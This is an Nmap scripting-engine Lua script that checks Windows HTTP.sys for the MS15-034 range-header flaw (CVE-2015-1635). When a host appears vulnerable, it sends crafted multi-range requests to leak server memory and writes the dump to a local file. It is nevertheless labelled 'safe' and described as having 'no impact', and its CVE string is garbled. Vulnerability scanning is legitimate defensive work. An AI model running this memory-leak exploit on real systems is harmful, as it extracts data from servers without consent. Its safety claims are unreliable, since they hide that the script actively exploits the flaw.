local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).

The script sends a specially crafted HTTP request with no impact on the system to detect this vulnerability.
The affected versions are Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, Windows 8.1,
and Windows Server 2012 R2.

References:
* https://technet.microsoft.com/library/security/MS15-034
]]

---
-- @usage nmap -sV --script vuln <target>
-- @usage nmap -p80 --script http-vuln-cve2015-1635.nse <target>
-- @usage nmap -sV --script http-vuln-cve2015-1635 --script-args uri='/anotheruri/' <target>
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2015-1635:
-- |   VULNERABLE:
-- |   Remote Code Execution in HTTP.sys (MS15-034)
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2015-1635
-- |       A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
-- |       caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
-- |       successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
-- |
-- |     Disclosure date: 2015-04-14
-- |     References:
-- |       https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
-- @args http-vuln-cve2015-1635.uri URI to use in request. Default: /
---

author = {"Kl0nEz", "Paulino <calderon()websec.mx>"}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

portrule = shortport.http

local VULNERABLE = "Requested Range Not Satisfiable"
local PATCHED = "The request has an invalid header name"

local function get_file_size(host, port, uri)
  local file_size = -1
  local options = {header={}}
  options['header']['Host'] = stdnse.generate_random_string(8)
  options['no_cache'] = true
  options['bypass_cache'] = true
  local response = http.get(host, port, uri, options)
  if response == nil then
    stdnse.debug1("Connection timed out.")
    return file_size
  end
  if response.status == 404 then
    stdnse.debug1("You got a 404. URI must be a valid resource.")
    return file_size
  end
  file_size = tonumber(response.header['content-length'])
  stdnse.debug1("file size: %d", file_size)
  return file_size
end

local function calc_ranges(content_length)
  local range = "bytes=3-18446744073709551615"
  local range_step = 100
  for range_start = 1, content_length, range_step do
    local range_end = range_start + range_step - 1
    if range_end > content_length then
      range_end = content_length
    end
    range = range .. string.format(",%s-%s", range_start, range_end)
  end
  return range
end

local function write_file (filename, contents)
  local f, err = io.open(filename, "w");
  if not f then
    return f, err;
  end
  f:write(contents);
  f:close();
  return true;
end

local function information_leak(host, port, uri)
  local options = {header={}}
  options['header']['Host'] = stdnse.generate_random_string(8)
  local content_length = get_file_size(host, port, uri)
  options['header']['Range'] = calc_ranges(content_length)
  options['no_cache'] = true
  options['bypass_cache'] = true
  stdnse.debug1("Range: %s", options['header']['Range'])
  local response = http.get(host, port, uri, options)
  if response.body == nil then
    return false, "No leaked information."
  end
  stdnse.debug1("Response: %s", response.body)
  return write_file("info.bin", stdnse.tohex(response.body)), "Memory dump saved in file \"info.bin\"."
end

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Remote Code Execution in HTTP.sys (MS15-034)',
    state = vulns.STATE.NOT_VULN,
    description = [[
A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
    ]],
    IDS = {CVE = 'CVE-2015-1635'},
    references = {
      'https://technet.microsoft.com/en-us/library/security/ms15-034.aspx'
    },
    dates = {
      disclosure = {year = '2015', month = '04', day = '14'},
    }
  }
  local options = {header={}}
  options['header']['Host'] = stdnse.generate_random_string(8)
  options['header']['Range'] = "bytes=0-18446744073709551615"
  options['no_cache'] = true
  options['bypass_cache'] = true
  local response = http.get(host, port, uri, options)
  response = http.get(host, port, uri, options)
  if response.status and response.body then
    if response.status == 416 and string.find(response.body, VULNERABLE) ~= nil
    and string.find(response.header["server"], "Microsoft") ~= nil then
      vuln.state = vulns.STATE.VULN
      local status, result = information_leak(host, port, uri)
      vuln.check_results = {result}
    end
    if response.body and string.find(response.body, PATCHED) ~= nil then
      stdnse.debug2("System is patched!")
      vuln.state = vulns.STATE.NOT_VULN
    end
  end
  return vuln_report:make_output(vuln)
end